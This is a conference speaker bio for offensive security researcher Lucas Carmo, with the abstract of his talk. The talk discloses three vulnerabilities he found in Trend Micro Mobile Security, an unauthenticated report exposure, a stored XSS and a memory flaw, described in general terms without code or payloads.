Lucas Carmo
Lucas Carmo is an offensive security researcher and co-founder of Hakai Security, a Brazilian consultancy focused on red teaming and exploit development. With over eight years of experience, he holds OSWE, OSWP, and GMOB certifications and has discovered CVEs in platforms like Trend Micro Mobile Security, Nagios, PRTG, 3CX, and Centreon. He leads Delta7, Hakai’s research division, guiding work on vulnerabilities in all environments. Lucas contributes to open-source projects such as the ReconFTW web UI and shares research through blogs and talks. Outside of hacking, he’s passionate about tattoos and views vulnerability research as a form of digital art.
Session
Trend Micro Mobile Security (TMMS) is a solution widely trusted by enterprises to defend Android devices. But what if the protection becomes the threat? In this talk, I reveal how the very software meant to secure mobile endpoints can be exploited to compromise them. During my research, I identified three vulnerabilities, two confirmed by the vendor.
First, I found that TMMS exposes sensitive security reports online without requiring authentication, revealing device data to anyone. Second, I uncovered a persistent stored XSS sent from Android agents during scans. This payload executes in the browser of any who accesses the report, allowing attackers to inject further malicious scripts. Lastly, I’ll discuss a memory-level manipulation identified during dynamic analysis of the scan routine, which could lead to code execution. These flaws present a high-impact attack surface individually, and a dangerous chain if combined.
This presentation includes recorded demos and a deep dive into the methodology used to discover these issues. It is tailored for red teamers, offensive security professionals, and researchers focused on mobile and infrastructure security.